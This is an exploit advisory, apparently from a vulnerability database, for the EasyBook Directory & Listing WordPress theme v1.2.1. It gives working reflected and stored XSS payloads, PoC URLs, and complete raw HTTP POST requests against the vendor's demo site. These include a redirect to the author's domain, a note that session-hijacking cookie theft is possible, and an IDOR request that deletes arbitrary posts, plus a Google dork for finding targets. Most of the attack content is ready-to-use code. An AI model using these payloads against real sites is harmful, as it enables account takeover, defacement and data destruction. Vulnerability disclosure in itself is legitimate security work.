EasyBook – Directory & Listing WordPress Theme v1.2.1 Multiple Vulnerabilities

2019.12.27
ru m0ze (RU) ru
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: EasyBook – Directory & Listing WordPress Theme v1.2.1 Multiple Vulnerabilities # Google Dork: /wp-content/themes/easybook/ # Date: 27/12/2019 # Exploit Author: m0ze # Vendor Homepage: https://cththemes.com/ # Software Link: https://themeforest.net/item/easybook-directory-listing-wordpress-theme/23206622 # Version: 1.2.1 # Tested on: Parrot OS # CWE: 79 ----[]- Reflected XSS: -[]---- Input field with placeholder «Hotel , City...» on the homepage is vulnerable. Same thing with a regular search (block under the «Add Listing» button). Payload Sample #0: <img src=x onerror=alert(document.cookie)> Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;> PoC #0: https://www.easybook.cththemes.org/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&checkin=&checkout=&adults=1&children=0 PoC #1: https://www.easybook.cththemes.org/?search_term=%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&checkin=&checkout=&adults=1&children=0 ----[]- Persistent XSS -> Chat: -[]---- Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website (from https://www.easybook.cththemes.org/dashboard/#/chats or from chat widget on the bottom right corner). Payload Sample #0: <img src=x onerror=alert(`m0ze`)> Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;> PoC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: www.easybook.cththemes.org User-Agent: Mozilla/5.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 144 Origin: https://www.easybook.cththemes.org DNT: 1 Connection: close Referer: https://www.easybook.cththemes.org/dashboard/ Cookie: _your_cookies_here_ action=easybook_addons_chat_reply&_nonce=1c8cd14288&cid=600&user_id=XXX&touid=1&reply_text=_payload_ Where: user_id=XXX (your unique WordPress ID); touid=1 (message receiver ID, in this example ID 1 == account «admin»); reply_text=_payload_ (your payload). ----[]- Persistent XSS -> Listing page: -[]---- Add new listing here https://www.easybook.cththemes.org/dashboard/#/addListing (first time you need to order a «Free» plan and go to this URL again). Vulnerable input fields: «Address», «Longitude», «Latitude», «Fact Title» and «Fact Number». Payload Sample #0: "><img src=x onerror=alert(document.cookie)> Payload Sample #1: "><h1>Greetings from m0ze</h1> Payload Sample #2: "><script>alert(`PoC`);</script> PoC: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: www.easybook.cththemes.org User-Agent: Mozilla/5.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------970149683563 Content-Length: 4142 Origin: https://www.easybook.cththemes.org DNT: 1 Connection: close Referer: https://www.easybook.cththemes.org/dashboard/ Cookie: _your_cookies_here_ -----------------------------970149683563 Content-Disposition: form-data; name="lid" 0 -----------------------------970149683563 Content-Disposition: form-data; name="listing_type_id" 5058 -----------------------------970149683563 Content-Disposition: form-data; name="isSubmit" true -----------------------------970149683563 Content-Disposition: form-data; name="working_hours[timezone]" America/New_York -----------------------------970149683563 Content-Disposition: form-data; name="working_hours[Monday][static]" enterHours -----------------------------970149683563 Content-Disposition: form-data; name="working_hours[Tuesday][static]" enterHours -----------------------------970149683563 Content-Disposition: form-data; name="working_hours[Wednesday][static]" enterHours -----------------------------970149683563 Content-Disposition: form-data; name="working_hours[Thursday][static]" enterHours -----------------------------970149683563 Content-Disposition: form-data; name="working_hours[Friday][static]" enterHours -----------------------------970149683563 Content-Disposition: form-data; name="working_hours[Saturday][static]" enterHours -----------------------------970149683563 Content-Disposition: form-data; name="working_hours[Sunday][static]" enterHours -----------------------------970149683563 Content-Disposition: form-data; name="locations" US|M -----------------------------970149683563 Content-Disposition: form-data; name="title" PoC -----------------------------970149683563 Content-Disposition: form-data; name="address" "><img src=x onerror=alert(1)> -----------------------------970149683563 Content-Disposition: form-data; name="longitude" "><img src=x onerror=alert(2)> -----------------------------970149683563 Content-Disposition: form-data; name="latitude" "><img src=x onerror=alert(3)> -----------------------------970149683563 Content-Disposition: form-data; name="author_email" M -----------------------------970149683563 Content-Disposition: form-data; name="author_phone" M -----------------------------970149683563 Content-Disposition: form-data; name="author_website" M -----------------------------970149683563 Content-Disposition: form-data; name="content" "><img src=x onerror=alert(document.domain)> -----------------------------970149683563 Content-Disposition: form-data; name="features[0]" 303 -----------------------------970149683563 Content-Disposition: form-data; name="features[1]" 300 -----------------------------970149683563 Content-Disposition: form-data; name="features[2]" 305 -----------------------------970149683563 Content-Disposition: form-data; name="features[3]" 302 -----------------------------970149683563 Content-Disposition: form-data; name="facts[0][title]" "><img src=x onerror=alert(9)> -----------------------------970149683563 Content-Disposition: form-data; name="facts[0][number]" "><img src=x onerror=alert(10)> -----------------------------970149683563 Content-Disposition: form-data; name="facts[0][icon]" 123 -----------------------------970149683563 Content-Disposition: form-data; name="lservices[0][service_id]" -imgsrcxonerroralert12 -----------------------------970149683563 Content-Disposition: form-data; name="lservices[0][service_name]" M -----------------------------970149683563 Content-Disposition: form-data; name="lservices[0][service_desc]" M -----------------------------970149683563 Content-Disposition: form-data; name="lservices[0][service_price]" 0 -----------------------------970149683563 Content-Disposition: form-data; name="action" submit_listing -----------------------------970149683563 Content-Disposition: form-data; name="_wpnonce" 1c8cd14288 -----------------------------970149683563-- ----[]- IDOR: -[]---- Delete any post/page/listing: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: www.easybook.cththemes.org User-Agent: Mozilla/5.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 64 Origin: https://www.easybook.cththemes.org DNT: 1 Connection: close Referer: https://www.easybook.cththemes.org/dashboard/ Cookie: _your_cookies_here_ action=easybook_addons_delete_listing&_nonce=1c8cd14288&lid=XXXX Where: lid=XXXX (page/post/listing unique WordPress ID, can be discovered as a page class for <body> tag).


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top